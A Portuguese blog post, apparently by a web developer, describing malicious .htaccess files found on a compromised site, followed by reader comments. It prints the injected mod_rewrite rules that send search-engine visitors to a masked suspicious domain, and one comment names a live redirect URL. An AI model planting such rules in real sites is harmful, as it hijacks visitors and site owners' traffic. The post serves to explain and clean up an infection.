Com algum espanto hoje verifiquei que um site que fiz tinha virus, corri e percorri o codigo todo sem encontrar nada em concreto, até que ao fim de umas horas decidi começar a verificar ficheiro por ficheiro em cada pasta incluindo o .htaccess onde verifiquei que tinha ficheiros .htaccess com o texto que segue mais abaixo.
É claro que eu ao visitar o site nunca iria ver o virus, pois o .htaccess faz uso do mod_rewrite do apache para redireccionar os visitantes que chegam ao nosso site a partir dos motores de busca para sites “suspeitos”.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://xxxxxx-xxxxxxx.xxxx [R,L]
A remoção do virus é basntante simples e passa tambem pelo que já expliquei no virus iframe como lhe chamei, passa pela limpeza do computador que no meu caso está “limpo” julgo eu 
e pela alteração de passwords ftp.
|
Se a rede é Thomson12345, colocas apenas 12345
Coloque no campo abaixo o MAC Address
Privacidade
Contactos
Publicidade
Cara isso aconteceu comigo e que dor de cabeça… vou seguir as dicas e malditos iframes…
Isso tb acontenceu comigo, deu uma puta dor de cabeça, foda que no meu servidor tinha ums 3 dominios e todos bem divulgados no google ..ai virou uma zona …puta merdaaa
Realmente isso é uma dor de cabeça. Têm uma paulada de sites de renome que estão com os htaccess infectados. Isso faz emganar especialmente o buscador do Google. Ao clicar-se nos links do site que administro nos links de resultado do Google, ocorria o redirecionamento para o seguinte link:
http://top.reliablebanner.com/main.php?i=Js2oitQcrP6ngRj7U8RGy5wXpQ==&e=0
Essa praga se alojou não só no htaccess do diretório raiz, mas também em todas as pastas e subpastas. Limpei os htaccess um a um e tudo voltou ao normal.